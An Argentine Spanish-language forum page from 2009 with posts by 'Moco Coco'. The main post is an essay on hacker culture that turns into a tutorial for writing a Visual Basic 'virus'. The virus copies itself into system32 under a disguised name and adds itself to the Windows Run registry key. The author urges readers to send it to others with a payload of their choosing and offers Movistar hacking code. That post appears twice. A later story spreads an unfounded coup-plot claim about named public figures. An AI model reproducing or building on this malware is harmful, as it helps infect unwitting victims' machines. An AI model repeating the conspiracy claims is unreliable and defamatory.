M

Moco_Coco

Usuario (Argentina)

Primer post: 17 abr 2009Último post: 2 ene 2017
20
Posts
1182
Puntos totales
161
Comentarios
Experiencias capitulo 14: Herencia.
Experiencias capitulo 14: Herencia.
InfoporAnónimo8/11/2009

Fernando me mira de pronto y me dice: -Me quedo algo desilusionado con lo del hacking marketinero -oh si, pero mientras quede gente que aprenda y sepa esta bien, y vos sabes, ahora tenes en que pensar –dije antes de subir a un taxi rumbo incierto. Era cierto, el hacking tuvo un costado marketinero desde siempre. El hacker en una época era mítico, era raro pero parecía algo así como la hechicería moderna, prohibida, no necesitabas ser bueno y estar con Dios para hacer milagros, ni siquiera era necesario tener la aprobación de todo el mundo, los reyes tenia un propio hechicero que ignorando cualquier ley divina dotaba al humano afortunado en la mayoría de casos de tesoros como conquistas e imperios y soberanía. En cierta forma, es una manera de ver al hacking. Yo divida el hacking desde tres puntos, el iniciatico, el hoobial y finalmente el practico/empresarial El iniciatico es aquel donde la mayoría queda, usando una analogía que Fernando utilizo esa noche diré que el hacking es como “un gran muro en el que o comenzas a apilar libros de saber para poder cruzarlo, o te estrellas contra el sin remedio” a lo que acote luego “o cruzás antes de que el muro exista...” El saber hacking de forma iniciatica es el lugar donde imperan dos tipos de personas, los arrogantes y los concientes. El arrogante inciatico es aquel que trabaja en pos de conseguir impresionar vana y vagamente a quien le pregunte del tema, es el imperio de los lammers o lols, de los gcc o clickeadores, sin embargo no necesariamente se debe uno estancar en este plano, existen varios ejemplos de lammers severísimos que hicieron grandes cosas. En cuanto a los cocientes determina su existencia el saber que hay tantas cosas que no saben que no se vanaglorian de saber o hacer, simplemente se callan o preguntan realmente a quien sabe, es de la boca de estos que jamás oís un “si yo se todo sobre...” Tampoco implica que estos sean futuros hackers reales, simplemente existen algunos que terminan sus carreras aburridos simplemente de la finiquitud del saber. El hacking hobbial es el mas frondoso en todas las artes, es aquel que impera en los corazones de la mayoría de hackers bestiales que ruedan por el mundo, es gente que simplemente respira casi en hexa, que miden su saber por lo que hacen, y hacen todo porque les gusta, parece no perseguir ningún fin, aunque si o si debe a ver un objetivo, pero este parece desvanecerse en el aprender mas y mas y mas. Finalmente el hacker que es practico/empresarial es el que retroalimenta a la mayoría de los hackers iniciaticos. El hacker practico / empresarial es aquel que o sabe muchísimo al punto que termina siendo contratado como mano derecha del medico brujo del pueblo, o bien esta tan acomodado en su empresa que directamente no actúa por no querer mas que por no poder. Es así de fácil. Aun mas fácil es entender que todos esos hackers en el fondo el algún momento comen, en algún momento cagan, y en algún momento duermen, bien o mal, perturbados o no, todos están expuestos. Toda esta amalgama de hackers enfermos que somos los que conformamos el mundo de esta forma estamos recientemente expuestos a una rama bastante interesante de las ciencias, la mitificación. Somos un mito! Es sencillo, cada vez que cuento estas historias pienso que si alguien lee esto superficialmente se come que es una película de hollywood, como hacerles ver que es cierto todo no? El carácter hacker es bien definido por el entorno que lo rodea, pero aun así, inclusive si les mostrara los logros o grandezas,.Si les pusiera delante el como y el porque, aun así, no llegarían a creer que todo esto es cierto. Y no importa, yo le encontré un gusto rico a esto, pero también es un gusto que a mas de uno le puede joder, yo comprendí que el hacking debe enseñarse para que sirva de algo. Cada vez que alguien me pide (y Dios, pasa a diario!) que le saque una contraseña de hotmail (o live como se llama ahora...) o que tire un facebook me lleno de simpatía y quiero enseñar lo que sé no para que no me joda, sino como la preservación de un arte efímero. Pero hasta ahora, con todo lo que estudie de historia, ningún arte efímero se a de convertir en un hechizo mortal para mas de uno mismo. En cambio el hacking parece ser algo sobrenatural, es ridículo, si lo piensan bien. Saben que tiene de atractivo el hacking para mi? Que no requiere nada mas que querer hacerlo realmente. Un amigo me dijo: Si buscas masones encontras masones, acá estamos en la misma, si buscas hackers, encontras hackers. Pero mientras que la masonería tiene un trasfondo iniciatico de compartir el saber, mayormente los hackers suelen ser celosos. A veces pienso porque y a la razón mas cercana que llegue es que a todo hacker le jode tanto tanto hacer algo grande que dejarlo a la mano de cualquiera es desvirtuarlo. Conozco hackers que prefieren dejarlo de lado todo y directamente enseñar con el ejemplo, otros pretender impartir saber a través de dejar herramientas y códigos para que se los bajen, compilen y ejecuten sin tener idea de una sola línea. Pero estos constituyen un vergonzoso 16% del total de hackers que e conocido, incluyéndome. Otras de las razones por la cual el hacking es importante es que para mi, balancea la vida desde un punto insoñado e históricamente inédito. Le da poder a cualquiera, sin importar nada mas que su técnica, gracia y arte. Es increíble pero cierto que un chico desde un garaje en Massachussets pueda tirar abajo a una compañía y hacer que esta pierda millones de dólares con tan solo un par de minutos/horas/dias/meses de trabajo desenfrenado. Si se lo ponen a pensar bien, nunca históricamente paso esto, jamás una persona sin poder político / monetario pudo reventar a una multinacional desde el sofá mientras se reía de los pitufos y se veía una porno mediante. Salvo los que concibieron poner una bomba y lo llevaron a cabo, pero aun así, necesitaron mas tiempo / dinero para hacerlo, llámese por movilidad, materiales o cualquier otro. Este aburridísimo documento de word 2003 pretende demostrar que cada uno de nosotros, llámese hackers, lammers o enfermitos tenemos un poder muy grande con tan solo pensar hasta cuando te duchas en... “y si...” El “y si....” es el arma fundamental del gobierno binario. Ahora cada vez mas parece esto stars war en la cual, existe un maestro para cada alumno solitario que enseña mas allá de todo saber. (me aburro escribiendo esto, pero aun así sigo, es un asco, parece ser como cuando en la secundaria te comías toda una charla de introducción a algo aburrido, pero esto es parte también de mis experiencias, así que cómanla o escúpanla, parafraseando a mi querido Anthony) Ahora bien, a que se enfrenta el iniciado? A simplemente un mar de saber desparejo. Todo es excitante, como cuando comenzas una carrera que te gusta, es igual. Demasiada información, demasiado desbalance de saberes, y los que saben no te la hacen sencillas. Vamos con un ejemplo, les digo que buena forma de iniciarse como Vmakers armen una aplicación de vb que se duplique a si misma, que se instale en el registro de windows xp sin advertir nada, que se inicie con el mismo y que a su vez, haga algo. Bien, que gana entonces el iniciado? Nada, puesto que no sabe por donde comenzar. Ahora bien acá les dejo el código de uno muy estúpido y programado a la marcha, lo puede programar cualquiera en serio, es muy idiota. Como hacer el virus? 1/6 Se bajan el visual basic. 2/6 Abren un nuevo proyecto. 3/6 Se van al menú "proyecto" (o "Project" y eligen "referencias" (o "references" 4/6 De la lista elijen "Windows Scripting Host Object Model" 5/6 Copian y pegan el siguiente código: '**//INICIO código del súper virus 3 patadas el muy famoso muyboludo.exe!! \\** 'ok, enumeremos que tiene que tener en esencia un virus: '1) Replicarse '2) Ejecutar acciones que el usuario desconoce. '3) Hacer algo estúpido / comercial... o tener una firma por algún lado... ' mmmm este cumple las 3!(aunque alguna este falseada...) así que oficialmente puede ser considerado un... virus! 'pd: por Dios, un vmaker que se valore como tal no debe programar en visual, 'intento hacer algo facil_de entender así que no me odien!!! no soy vmaker. 'pd2: Aproposito hice que el virus falle en alguna de las reglas, intenten por lógica deducir a cual... Const RAMA_WINDOWS_RUN As String = "HKEY_LOCAL_MACHINE\SOFTWARE\" & "Microsoft\Windows\CurrentVersion\Run\" Dim o_Registro As WshShell Dim a As Integer Private Sub Form_Load() Set o_Registro = New WshShell FileCopy "MsLocalConfig.exe", "c:\windows\system32\MsLocalConfig.exe" Call o_Registro.RegWrite(RAMA_WINDOWS_RUN & App.EXEName, "c:\windows\system32\MsLocalConfig.exe" & "\" & App.EXEName & ".exe" a = MsgBox("Hace algo estúpido", vbCritical, "acá pongo la firma: Moco Coco 2009" FileCopy "MsLocalConfig.exe", "c:\windows\system32\MsLocalConfig.exe" Me.Hide End Sub Private Sub Form_Unload(Cancel As Integer) If Not o_Registro Is Nothing Then Set o_Registro = Nothing End If End Sub '**//FIN código del súper virus 3 patadas el muy famoso muyboludo.exe!! \\** 6/6 guardan el virus bajo el nombre MsLocalConfig.exe. 2 aclaraciones: Este virus esta programado a lo boludo, y explicado como tal, por una cuestion de honor, pido se me considere, ah mi cerebro a esta hora no da para mas. No se recomienda probar el virus en la maquina propia sin tener algún programa onda deep freeze Y que ganan con esto? Copiar y pegar sin aprender a hacer nada. Puedo entonces explicar algo del código: 1) las primeras líneas de código arrancan con una ‘ esto significa que es un comentario, obviamente, pueden suprimirlo, la idea es que vieran el tipo de aclaraciones que alguien ve cuando modifica un virus cualquiera 2) Comienza luego una declaración de una constante, es decir un valor que no variara a lo largo del código, este valor, que se llama RAMA_WINDOWS_RUN y que contiene una cadena de texto (a saber, una sucesión de caracteres) equivale a la ruta del registro de windows donde se guardan todos los elementos del inicio. Const RAMA_WINDOWS_RUN As String = "HKEY_LOCAL_MACHINE\SOFTWARE\" & "Microsoft\Windows\CurrentVersion\Run\" 3) Se declaran dos variables, la primera es para almacenar un tipo de información que sirve para poder jugar con los elementos de visual como el "Windows Scripting Host Object Model" La segunda es una variable que puse por poner pero luego almacenara lo que yo elija del msgbox (ósea, contendrá que botón pulse de la ventanita de alerta) Dim o_Registro As WshShell Dim a As Integer 4) esto significa: cuando se carga el formulario…. Private Sub Form_Load() 4) Set o_Registro = New WshShell significa que o_Registro almacenara la informacion de WshShell 5) Basicamente, esta línea de código es la encargada de tomar la aplicación actual y ponerla al inicio de windows… Call o_Registro.RegWrite(RAMA_WINDOWS_RUN & App.EXEName, App.Path & "\" & App.EXEName & ".exe" 6) Esta es la parte mas importante, acá deberían hacer algo estúpido, en mi caso va a ser que se abra una ventanita pedorra con el mensaje “hace algo estúpido” a = MsgBox("Hace algo estúpido", vbCritical, "acá pongo la firma: Moco Coco 2009" 7) acá pido se copie el archivo a la ruta antes puesta, el nombre se lo puse yo, pero lo pueden cambiar si quieren o hacerla mas fácil, que el soft consiga el nombre de la aplicación que se ejecuta, ya dije, este esta a lo boludo… FileCopy "MsLocalConfig.exe", "c:\windows\system32\MsLocalConfig.exe" 8) Esconde la aplicación. Me.Hide 9) ”End Sub” sirve para decir que termina un procedimiento, acá, la carga del formulario. 10) De acá para abajo, hasta al final, es bastante obviable porque concierne la eliminación de la referencia creada si el form no se cargo o si el evento no se produjo, cosa que por lógica ocurre, así que es inútil, yo la deje para molestar un rato, aparte, vi el ejemplo en una pagina web y me gusto. Private Sub Form_Unload(Cancel As Integer) If Not o_Registro Is Nothing Then Set o_Registro = Nothing End If End Sub Pero que ganan con esto otro? tampoco nada, solamente si les interesa mas adelante pensar como hacer un virus pueden lograr sacarle algo de jugo. El temas es “y si...” les digo que necesitan para aprender? Ejemplo, razonen un segundo, supongamos que nada saben de estas artes, pero lean detenidamente la consigna: “aplicación de vb que se duplique a si misma, que se instale en el registro de windows xp sin advertir nada, que se inicie con el mismo y que a su vez, haga algo.” Enumeremos los saberes necesarios: Saber copiar archivos. Saber iniciar al inicio de windows. Saber hacer que pase algo. Es tanto poner el google los siguientes criterios? “Copiar archivo”+”visual basic” “Aplicación al inicio”+”windows xp”+”visual basic” “cargar foto porno”+”visual basic” Dios! Que no, que no se harán ingenieros en un día, que no, que no aprenderán que es Dim o_Registro As WshShell que no, que vayan pensando en otra cosa ya que estamos, total.... ahora bien, ahí tienen un programa, requiere que se lo envíen a alguien, queda en cada uno que quiera ponerle que ocurra, pueden apagar el equipo, pueden hacer que no haga nada, pueden hacer... pero hagan, busquen, un poco nada mas. Obviamente, nadie se recibe de vmaker salvo que te diga alguien que sabe como mas que vos que lo sos, pero al fin que un poco de practica no mata a nadie no? Salgamos un poco del marketing, olvídense por un momento de sacar crédito gratis en movistar, sean muy poco realistas, pero ya que estamos, programen un poco, es un buen comienzo. Moco Coco 2009 Pd: Si les gusta la idea, les tiro líneas de código para hackear movistar. Pd2: Si les gusta la idea, les digo como escribí en visual basic medio dormido. Pd3: Les dejo un ejercicio; Busquen en google varias paginas que les diga como hacer un virus en visual basic, y posteen el código en algún lugar, no acá, en cualquier lado donde puedan, vamos, no les llevara mas de cinco o diez minutos. Pd4: No me gusta mucho visual basic, pero a mas de uno le resultara mas fácil que mi amado Ruby.

0
0
M
Moco Coco; Experiencias capitulo 14: Herencia.
InfoporAnónimo8/11/2009

Experiencias capitulo 14: Herencia. Fernando me mira de pronto y me dice: -Me quedo algo desilusionado con lo del hacking marketinero -oh si, pero mientras quede gente que aprenda y sepa esta bien, y vos sabes, ahora tenes en que pensar –dije antes de subir a un taxi rumbo incierto. Era cierto, el hacking tuvo un costado marketinero desde siempre. El hacker en una época era mítico, era raro pero parecía algo así como la hechicería moderna, prohibida, no necesitabas ser bueno y estar con Dios para hacer milagros, ni siquiera era necesario tener la aprobación de todo el mundo, los reyes tenia un propio hechicero que ignorando cualquier ley divina dotaba al humano afortunado en la mayoría de casos de tesoros como conquistas e imperios y soberanía. En cierta forma, es una manera de ver al hacking. Yo divida el hacking desde tres puntos, el iniciatico, el hoobial y finalmente el practico/empresarial El iniciatico es aquel donde la mayoría queda, usando una analogía que Fernando utilizo esa noche diré que el hacking es como “un gran muro en el que o comenzas a apilar libros de saber para poder cruzarlo, o te estrellas contra el sin remedio” a lo que acote luego “o cruzás antes de que el muro exista...” El saber hacking de forma iniciatica es el lugar donde imperan dos tipos de personas, los arrogantes y los concientes. El arrogante inciatico es aquel que trabaja en pos de conseguir impresionar vana y vagamente a quien le pregunte del tema, es el imperio de los lammers o lols, de los gcc o clickeadores, sin embargo no necesariamente se debe uno estancar en este plano, existen varios ejemplos de lammers severísimos que hicieron grandes cosas. En cuanto a los cocientes determina su existencia el saber que hay tantas cosas que no saben que no se vanaglorian de saber o hacer, simplemente se callan o preguntan realmente a quien sabe, es de la boca de estos que jamás oís un “si yo se todo sobre...” Tampoco implica que estos sean futuros hackers reales, simplemente existen algunos que terminan sus carreras aburridos simplemente de la finiquitud del saber. El hacking hobbial es el mas frondoso en todas las artes, es aquel que impera en los corazones de la mayoría de hackers bestiales que ruedan por el mundo, es gente que simplemente respira casi en hexa, que miden su saber por lo que hacen, y hacen todo porque les gusta, parece no perseguir ningún fin, aunque si o si debe a ver un objetivo, pero este parece desvanecerse en el aprender mas y mas y mas. Finalmente el hacker que es practico/empresarial es el que retroalimenta a la mayoría de los hackers iniciaticos. El hacker practico / empresarial es aquel que o sabe muchísimo al punto que termina siendo contratado como mano derecha del medico brujo del pueblo, o bien esta tan acomodado en su empresa que directamente no actúa por no querer mas que por no poder. Es así de fácil. Aun mas fácil es entender que todos esos hackers en el fondo el algún momento comen, en algún momento cagan, y en algún momento duermen, bien o mal, perturbados o no, todos están expuestos. Toda esta amalgama de hackers enfermos que somos los que conformamos el mundo de esta forma estamos recientemente expuestos a una rama bastante interesante de las ciencias, la mitificación. Somos un mito! Es sencillo, cada vez que cuento estas historias pienso que si alguien lee esto superficialmente se come que es una película de hollywood, como hacerles ver que es cierto todo no? El carácter hacker es bien definido por el entorno que lo rodea, pero aun así, inclusive si les mostrara los logros o grandezas,.Si les pusiera delante el como y el porque, aun así, no llegarían a creer que todo esto es cierto. Y no importa, yo le encontré un gusto rico a esto, pero también es un gusto que a mas de uno le puede joder, yo comprendí que el hacking debe enseñarse para que sirva de algo. Cada vez que alguien me pide (y Dios, pasa a diario!) que le saque una contraseña de hotmail (o live como se llama ahora...) o que tire un facebook me lleno de simpatía y quiero enseñar lo que sé no para que no me joda, sino como la preservación de un arte efímero. Pero hasta ahora, con todo lo que estudie de historia, ningún arte efímero se a de convertir en un hechizo mortal para mas de uno mismo. En cambio el hacking parece ser algo sobrenatural, es ridículo, si lo piensan bien. Saben que tiene de atractivo el hacking para mi? Que no requiere nada mas que querer hacerlo realmente. Un amigo me dijo: Si buscas masones encontras masones, acá estamos en la misma, si buscas hackers, encontras hackers. Pero mientras que la masonería tiene un trasfondo iniciatico de compartir el saber, mayormente los hackers suelen ser celosos. A veces pienso porque y a la razón mas cercana que llegue es que a todo hacker le jode tanto tanto hacer algo grande que dejarlo a la mano de cualquiera es desvirtuarlo. Conozco hackers que prefieren dejarlo de lado todo y directamente enseñar con el ejemplo, otros pretender impartir saber a través de dejar herramientas y códigos para que se los bajen, compilen y ejecuten sin tener idea de una sola línea. Pero estos constituyen un vergonzoso 16% del total de hackers que e conocido, incluyéndome. Otras de las razones por la cual el hacking es importante es que para mi, balancea la vida desde un punto insoñado e históricamente inédito. Le da poder a cualquiera, sin importar nada mas que su técnica, gracia y arte. Es increíble pero cierto que un chico desde un garaje en Massachussets pueda tirar abajo a una compañía y hacer que esta pierda millones de dólares con tan solo un par de minutos/horas/dias/meses de trabajo desenfrenado. Si se lo ponen a pensar bien, nunca históricamente paso esto, jamás una persona sin poder político / monetario pudo reventar a una multinacional desde el sofá mientras se reía de los pitufos y se veía una porno mediante. Salvo los que concibieron poner una bomba y lo llevaron a cabo, pero aun así, necesitaron mas tiempo / dinero para hacerlo, llámese por movilidad, materiales o cualquier otro. Este aburridísimo documento de word 2003 pretende demostrar que cada uno de nosotros, llámese hackers, lammers o enfermitos tenemos un poder muy grande con tan solo pensar hasta cuando te duchas en... “y si...” El “y si....” es el arma fundamental del gobierno binario. Ahora cada vez mas parece esto stars war en la cual, existe un maestro para cada alumno solitario que enseña mas allá de todo saber. (me aburro escribiendo esto, pero aun así sigo, es un asco, parece ser como cuando en la secundaria te comías toda una charla de introducción a algo aburrido, pero esto es parte también de mis experiencias, así que cómanla o escúpanla, parafraseando a mi querido Anthony) Ahora bien, a que se enfrenta el iniciado? A simplemente un mar de saber desparejo. Todo es excitante, como cuando comenzas una carrera que te gusta, es igual. Demasiada información, demasiado desbalance de saberes, y los que saben no te la hacen sencillas. Vamos con un ejemplo, les digo que buena forma de iniciarse como Vmakers armen una aplicación de vb que se duplique a si misma, que se instale en el registro de windows xp sin advertir nada, que se inicie con el mismo y que a su vez, haga algo. Bien, que gana entonces el iniciado? Nada, puesto que no sabe por donde comenzar. Ahora bien acá les dejo el código de uno muy estúpido y programado a la marcha, lo puede programar cualquiera en serio, es muy idiota. Como hacer el virus? 1/6 Se bajan el visual basic. 2/6 Abren un nuevo proyecto. 3/6 Se van al menú "proyecto" (o "Project" y eligen "referencias" (o "references" 4/6 De la lista elijen "Windows Scripting Host Object Model" 5/6 Copian y pegan el siguiente código: '**//INICIO código del súper virus 3 patadas el muy famoso muyboludo.exe!! ** 'ok, enumeremos que tiene que tener en esencia un virus: '1) Replicarse '2) Ejecutar acciones que el usuario desconoce. '3) Hacer algo estúpido / comercial... o tener una firma por algún lado... ' mmmm este cumple las 3!(aunque alguna este falseada...) así que oficialmente puede ser considerado un... virus! 'pd: por Dios, un vmaker que se valore como tal no debe programar en visual, 'intento hacer algo facil_de entender así que no me odien!!! no soy vmaker. 'pd2: Aproposito hice que el virus falle en alguna de las reglas, intenten por lógica deducir a cual... Const RAMA_WINDOWS_RUN As String = "HKEY_LOCAL_MACHINESOFTWARE" & "MicrosoftWindowsCurrentVersionRun" Dim o_Registro As WshShell Dim a As Integer Private Sub Form_Load() Set o_Registro = New WshShell FileCopy "MsLocalConfig.exe", "c:windowssystem32MsLocalConfig.exe" Call o_Registro.RegWrite(RAMA_WINDOWS_RUN & App.EXEName, "c:windowssystem32MsLocalConfig.exe" & "" & App.EXEName & ".exe" a = MsgBox("Hace algo estúpido", vbCritical, "acá pongo la firma: Moco Coco 2009" FileCopy "MsLocalConfig.exe", "c:windowssystem32MsLocalConfig.exe" Me.Hide End Sub Private Sub Form_Unload(Cancel As Integer) If Not o_Registro Is Nothing Then Set o_Registro = Nothing End If End Sub '**//FIN código del súper virus 3 patadas el muy famoso muyboludo.exe!! ** 6/6 guardan el virus bajo el nombre MsLocalConfig.exe. 2 aclaraciones: Este virus esta programado a lo boludo, y explicado como tal, por una cuestion de honor, pido se me considere, ah mi cerebro a esta hora no da para mas. No se recomienda probar el virus en la maquina propia sin tener algún programa onda deep freeze Y que ganan con esto? Copiar y pegar sin aprender a hacer nada. Puedo entonces explicar algo del código: 1) las primeras líneas de código arrancan con una ‘ esto significa que es un comentario, obviamente, pueden suprimirlo, la idea es que vieran el tipo de aclaraciones que alguien ve cuando modifica un virus cualquiera 2) Comienza luego una declaración de una constante, es decir un valor que no variara a lo largo del código, este valor, que se llama RAMA_WINDOWS_RUN y que contiene una cadena de texto (a saber, una sucesión de caracteres) equivale a la ruta del registro de windows donde se guardan todos los elementos del inicio. Const RAMA_WINDOWS_RUN As String = "HKEY_LOCAL_MACHINESOFTWARE" & "MicrosoftWindowsCurrentVersionRun" 3) Se declaran dos variables, la primera es para almacenar un tipo de información que sirve para poder jugar con los elementos de visual como el "Windows Scripting Host Object Model" La segunda es una variable que puse por poner pero luego almacenara lo que yo elija del msgbox (ósea, contendrá que botón pulse de la ventanita de alerta) Dim o_Registro As WshShell Dim a As Integer 4) esto significa: cuando se carga el formulario…. Private Sub Form_Load() 4) Set o_Registro = New WshShell significa que o_Registro almacenara la informacion de WshShell 5) Basicamente, esta línea de código es la encargada de tomar la aplicación actual y ponerla al inicio de windows… Call o_Registro.RegWrite(RAMA_WINDOWS_RUN & App.EXEName, App.Path & "" & App.EXEName & ".exe" 6) Esta es la parte mas importante, acá deberían hacer algo estúpido, en mi caso va a ser que se abra una ventanita pedorra con el mensaje “hace algo estúpido” a = MsgBox("Hace algo estúpido", vbCritical, "acá pongo la firma: Moco Coco 2009" 7) acá pido se copie el archivo a la ruta antes puesta, el nombre se lo puse yo, pero lo pueden cambiar si quieren o hacerla mas fácil, que el soft consiga el nombre de la aplicación que se ejecuta, ya dije, este esta a lo boludo… FileCopy "MsLocalConfig.exe", "c:windowssystem32MsLocalConfig.exe" 8) Esconde la aplicación. Me.Hide 9) ”End Sub” sirve para decir que termina un procedimiento, acá, la carga del formulario. 10) De acá para abajo, hasta al final, es bastante obviable porque concierne la eliminación de la referencia creada si el form no se cargo o si el evento no se produjo, cosa que por lógica ocurre, así que es inútil, yo la deje para molestar un rato, aparte, vi el ejemplo en una pagina web y me gusto. Private Sub Form_Unload(Cancel As Integer) If Not o_Registro Is Nothing Then Set o_Registro = Nothing End If End Sub Pero que ganan con esto otro? tampoco nada, solamente si les interesa mas adelante pensar como hacer un virus pueden lograr sacarle algo de jugo. El temas es “y si...” les digo que necesitan para aprender? Ejemplo, razonen un segundo, supongamos que nada saben de estas artes, pero lean detenidamente la consigna: “aplicación de vb que se duplique a si misma, que se instale en el registro de windows xp sin advertir nada, que se inicie con el mismo y que a su vez, haga algo.” Enumeremos los saberes necesarios: Saber copiar archivos. Saber iniciar al inicio de windows. Saber hacer que pase algo. Es tanto poner el google los siguientes criterios? “Copiar archivo”+”visual basic” “Aplicación al inicio”+”windows xp”+”visual basic” “cargar foto porno”+”visual basic” Dios! Que no, que no se harán ingenieros en un día, que no, que no aprenderán que es Dim o_Registro As WshShell que no, que vayan pensando en otra cosa ya que estamos, total.... ahora bien, ahí tienen un programa, requiere que se lo envíen a alguien, queda en cada uno que quiera ponerle que ocurra, pueden apagar el equipo, pueden hacer que no haga nada, pueden hacer... pero hagan, busquen, un poco nada mas. Obviamente, nadie se recibe de vmaker salvo que te diga alguien que sabe como mas que vos que lo sos, pero al fin que un poco de practica no mata a nadie no? Salgamos un poco del marketing, olvídense por un momento de sacar crédito gratis en movistar, sean muy poco realistas, pero ya que estamos, programen un poco, es un buen comienzo. Moco Coco 2009 Pd: Si les gusta la idea, les tiro líneas de código para hackear movistar. Pd2: Si les gusta la idea, les digo como escribí en visual basic medio dormido. Pd3: Les dejo un ejercicio; Busquen en google varias paginas que les diga como hacer un virus en visual basic, y posteen el código en algún lugar, no acá, en cualquier lado donde puedan, vamos, no les llevara mas de cinco o diez minutos. Pd4: No me gusta mucho visual basic, pero a mas de uno le resultara mas fácil que mi amado Ruby.

40
8
Moco Coco; Experiencias: Capitulo 10: How to ...
Moco Coco; Experiencias: Capitulo 10: How to ...
InfoporAnónimo7/21/2009

Experiencias: Capitulo 10: How to ... Confirm Overwrite files? Y/O… Eso decía la consola tras un amage mío por pulsar la sobre mentada y gastada tecla Y del teclado del ciber… Confirm Overwrite files? Y/O… De entre los diversos temas que aborrezco tocar en internet son los tutoriales los que me ocuparon para llegar a aquello. La mayoría de esos son tan vacíos... tan secos... escuetos en información al punto de la inconciencia. No se puede mas que tener desdeño hacia un material tan vano que haría vomitar al mas fiel seguidor de Maru Botana. Y al punto de comparación con ella se puede igualar su imbecilidad. La vida no es mas que un conjunto de decisiones boleeanas y no hay con que darle. Ahora debía elegir si seguir adelante con eso si o no. Los Disturbia eran un sub genero del UnderHack local con los cuales uno se topaba de vez en cuando en algún que otro torneito de hacking que se improvisaba en el canal de GaliaHack del IRC. Si bien los Disturbia no tenían un líder, la idea paranoica de que todo el mundo conspiraba contra todo el mundo los unía de forma irremediable y se entregaban a ella como si fuera el mas carismático líder nazi. El gran problema con ellos no era que se pasaran horas y horas en los chat diciendo cosas irracionales hasta que algún administrador cansado los banneaba, el problema era que a veces, y solo a veces, cuando uno los escuchaba parecía tan real y palpable y explicable todo al punto real de llegar a entender porque eran individualizados de cualquier otra postura hack. Y fue por culpa de un fucking tutorial que yo caí en manos tan desgraciadas que agraciadamente me acogieron (o simplifiquemos la oración restándole la “a”) a la vez que comprendí que tenían algo de razón... Pero echar culpas es de poco hombre así que asumo parte de mi responsabilidad y la otra parte la comparto (ups, mi costado femenino alerta) con mi amigo Sergio Morales de Capital federal quien, tras casi 7 años ininterrumpidos de estudio, concluía la secundaria que debía durar 3. Fue por el y la impaciencia que por las ganas de hacerle un video-montaje divertido termina bajando los archivos. No me extraño mucho que un tutorial de Adobe Premiere incluyera un archivo mdb, a veces la gente que hace o compila los tutoriales agarra algún icono perdido de escritorio (cuenten sino la cantidad irremediables de archivos lnk que encuentran en algunos rar o zip). Lo que si me extraño de verdad fue que todos los campos de la tabla estuviesen en PGP... El croma verde que nombraba el tutorial fue dejado de lado ante este hallazgo. Fijándome en los datos del archivo veo que había sido creado por un tal GENEPACK ARGERNTO. Que habría ahí que debía ocultarse no? Muchas búsquedas en internet sin resultado a veces contraen que uno caiga en manos de gente rara... Así que mi reunión de viernes a la noche con la parte mas honorablemente terrorífica del grupo Lejana Estigia se vio invadida invariablemente por el comentario sobre el hallazgo. Mi comentario de “che gente, encontré un mdb con datos en PGP dentro de un tutorial de Adobe Premiere” paso desapercibida por todos salvo por un señorito finito que me hablaba en privado. -quien lo firmaba? – indagó aquel muchacho de tan poca vida social como la mía. -no sep-respondí-solo que el autor era un tal GENEPACK Silencio. Eso recibí. Silencio -Estas ahí mi confuso amigo? -Si, acá estoy, leeme bien, vos de dnd sos? -Buenos Aires, Argentina. -Si si, pero de que localidad? -Capital federal, barrio Palermo-mentí- a que viene? -Vos no sabes lo que es eso no? Tras reconocer en esa frase trillada a un Disturbia proseguí. -No no tengo idea. -Mira, te la hago corta, tenes algún email encriptado? -Si. -Bueno, guarda esta conversación y te voy mandar algo, pasame la dirección, si sos grande como todo dice acá (Dios sabe a donde se referiría) vas a entender. -Ok, bien que así sea. Abrí una de esas cuentas de ftp usurpado por ahí y mudé mis archivos para obtener mi webmail en php, tras esto, le envié mi dirección temporal con la advertencia: -pero mira que si en 10 minutos no me mandas nada cierro la cuenta. -No te preocupes, revisalo, yo ahora me desconecto, ya vamos a hablar si dios quiere.Eot. -eot... y de ahí salte a mi webmail temporal a la espera de alguna respuesta. Media hora mas tarde descubrí que había olvidado entrar, al fin que tratar de levantarme (infructíferamente) a una gótica hacker era mejor que un archivo mdb. Pero al actualizar la pagina vi que el Disturbia había cumplido. Una secuencia muy extraña de números recibí e inmediatamente supe de que hablaba. Era obvio no se dan cuenta? Vamos piensen un toque. El tipo pide que guarde aquella conversación, no olviden que es un paranoico enfermo, y me manda una secuencia de números. La charla no era un himno a la criptografia, así que esa secuencia menos de una clave debía ser. Si no era la clave el mensaje, lo era la secuencia, así que algo debía ser entre una y otra. Vamos, un poco mas. Ahora bien si la clave era la secuencia y la charla el mensaje (Era un supuesto rápido nada mas) el mensaje decodificado estaba aguardando a que los descubriera usando... esteganografia! Intente hacerlo y así fue: El enfermo me había mandado una secuencia de números que me servia a mi para marcar ciertas letras la charla y armar un mensaje. El resultado fue: irenevega Decidido a perder la noche me puse a buscar datos sobre la irene vega. 30 millones de resultados y mas de 400tas irene vega después depuse mi búsqueda reemplazándola por el intentar entrar a los archivos con dicha palabra. Así fue. El primer archivo solamente cedió ante la palabra megamagica . El resultado era el siguiente: ULTIMA TRANSMISIÓN DEL GRUPO CHORIZO. BUENOS AIRES: 3 DE AGOSTO DE 2000 ESTAMOS ACA EN BOQUERON AL 570 BARRIO DE LINIERS Y TERMINAMOS DE ENFRENTARNOS A LA GENTE DE XTEAM, NO SE SI SE AVIVARON PERO LES SACAMOS VARIAS COSAS SOBRE DE LA RUA Y PERGOLINI. DICEN QUE TENEMOS UN MOVIL SOBRE LA CABEZA Y QUE EN DOS MINUTOS CAE LA YUTA. LOS ARCHIVOS QUE ESTAN EN ESTE DOCUMENTO COMPRUEBAN QUE EL HIJO DE PUTA DE LANATA Y PERGOLINI MISMO ESTAN METIDOS CON UN GOLPE DE ESTADO. QUIEREN TIRAR AL INÚTIL DE LA RUA Y USAN UN METODO BUENÍSIMO, METERLE BRONCA A LA GENTE. TIENEN TODO ESTUDIADO. LA GENTE DE LA ROCK AND POP HACE RATO LABURO EN EL PROYECTO INVENTANDO EL TEMA NEGROS DE MIERDA Y DIFUNDIÉNDOLO DESDE DATAFULL. ESA ES LA PRIMERA, DESPUÉS DE ESO, LANATA TIENE UN GRUPO DE HACKERS METIDO HASTA LAS PELOTAS CON EL GOBIERNO QUE QUIEREN FAMA Y ESTAN HACKEANDO A TODOS. EL HUEVON DE PERGOLINI ANDA EN LA MISMA Y ESTA HACIENDOSE DE UN GRUPO DE HACKERS COMANDADOS POR UN TAL ARROJO QUE DESPUÉS LO VAN A LIMPIAR. ESTO NO ES JODA, BASTA UN POCO DE BARDO Y LA GENTE REVIENTA, LOS POLÍTICOS ESTAN SIENDO HACKEADOS PARA SER ESTORCIONADOS Y ASI VOTAR CUALQUIER MIERDA QUE A LA LARGA O A LA CORTA VA A TIRAR 